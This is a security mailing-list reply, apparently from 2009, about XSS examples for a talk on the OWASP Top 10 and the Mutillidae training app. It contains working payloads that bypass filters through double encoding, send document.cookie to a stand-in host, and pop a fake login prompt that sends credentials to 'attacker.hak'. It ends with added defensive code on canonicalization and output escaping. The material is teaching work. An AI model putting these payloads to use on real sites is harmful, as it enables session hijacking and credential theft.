Adrian,
On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:
Ok, I've got yet another presentation coming up, this time on the
OWASP Top 10 and Mutillidae. One of the things I'm going to cover is
XSS. The canonical example of course is:
<script>alert("XSS");</script>
but that is boring, and gives folks the impression that XSS is not
that serious. Better short examples would be:
One of the more interesting challenges with web applications is the
fact that the browser supports multiple encoding types and double
encoding of entries.
Here is a SIMPLE double encode of your alert:
<script>alert('WEEEE');</script>
Hex encode the < and / tags:
%3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E
Maybe you can avoid simple single-encode filtering by
encoding the % in the '%3C':
%253Cscript%253Ealert('WEEE');%253C%252Fscript%253E
We can go further and continue to obfuscate things and bypass more and
more filters.
Redirect traffic to your site:
<script>window.location = "http://www.irongeek.com/"</script>
A little cookie Grabbing:
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
In addition, it's also worthwhile to note that you do not even need to
have a real running web server on this particular http://some-ip/mutillidae/
The important thing to note is what the browser is understanding here.
http://some-ip/catch.php? <- this script doesn't technically need to
exist.
cookie='+ <--- this is the part that is telling the browser hey in the
actual URL stream append something beyond the cookie= field.
+encodeURI(document.cookie); <- HEY in the URI field insert your
current cookie from this current site and send it in the raw URL.
If you have a backdoor listening shell then you will get the cookie in
a URI encoded format showing up in your listener as a RAW http request.
Or maybe a password form to make people think they have to login,
but it just grabs the credentials:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");
</script>
What are other cool things to inject, besides maybe BeEF, that show
off how XSS can be a big deal?
Other uses include a distributed port scanner within javascript
leveraging the browser and sending in a port scan and scanning the
network that she is on.
Thanks,
Adrian
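The double-encoding discussion above is easy to see in code. The following is an added example written for this thread, not code from Adrian, the replying author, or Mutillidae; it runs under Node and all function and variable names (naiveFilterPasses, canonicalize, canonicalFilterPasses, htmlEscape, renderReflected, demo) are my own. It shows a filter that URL-decodes once being bypassed by the %253C form, then the two defensive measures that close the gap: canonicalize the input before validating it, and HTML-escape on output so that whatever gets through is rendered as text rather than executed.

```javascript
// Added example, not from the original thread: why a once-decoding filter
// misses double-encoded input, and what a defender does instead.
// Function and variable names here are my own (assumed, not from the page).

// A naive reflected-parameter filter: decode once, then reject "<script".
function naiveFilterPasses(rawParam) {
  const decodedOnce = decodeURIComponent(rawParam);
  return !/<script/i.test(decodedOnce);
}

// Canonicalize: decode repeatedly until the value stops changing, so
// "%253C" and "%3C" both become "<" before any validation runs. The round
// limit bounds the work on adversarial input; a URIError from a malformed
// %xx sequence simply ends the loop and keeps the last good value.
function canonicalize(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break;
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// The same check, but run against the canonical form.
function canonicalFilterPasses(rawParam) {
  return !/<script/i.test(canonicalize(rawParam));
}

// Output encoding: the durable fix. Every character with HTML meaning is
// replaced by its entity, so "<script>" arrives in the page as text.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Simulates an application that ends up decoding twice (for example, the
// web server decodes the query string once and application code decodes
// it again) and then reflects the value into a page.
function renderReflected(rawParam, escapeOutput) {
  const decodedTwice = decodeURIComponent(decodeURIComponent(rawParam));
  const body = escapeOutput ? htmlEscape(decodedTwice) : decodedTwice;
  return `<p>You searched for: ${body}</p>`;
}

// Constructed sample inputs, matching the single- and double-encoded
// payloads discussed in the thread.
const SINGLE_ENCODED = "%3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E";
const DOUBLE_ENCODED = "%253Cscript%253Ealert('WEEEE');%253C%252Fscript%253E";

// Runs each scenario and returns the outcomes so they can be checked.
function demo() {
  return {
    singleBlockedByNaive: !naiveFilterPasses(SINGLE_ENCODED),
    doubleSlipsPastNaive: naiveFilterPasses(DOUBLE_ENCODED),
    doubleBlockedByCanonical: !canonicalFilterPasses(DOUBLE_ENCODED),
    unescapedOutput: renderReflected(DOUBLE_ENCODED, false),
    escapedOutput: renderReflected(DOUBLE_ENCODED, true),
  };
}

console.log(demo());
```

The point of the example from the defender's side: a blocklist on one decoding pass is only as good as the guess about how many times the value will be decoded downstream, whereas canonicalizing first removes that guess, and escaping on output makes the filter a second line rather than the only one. Two further mitigations for the cookie-grabbing payload that need no code here: marking the session cookie HttpOnly keeps it out of document.cookie, and a Content-Security-Policy that does not allow inline script stops the injected block from running at all.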
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com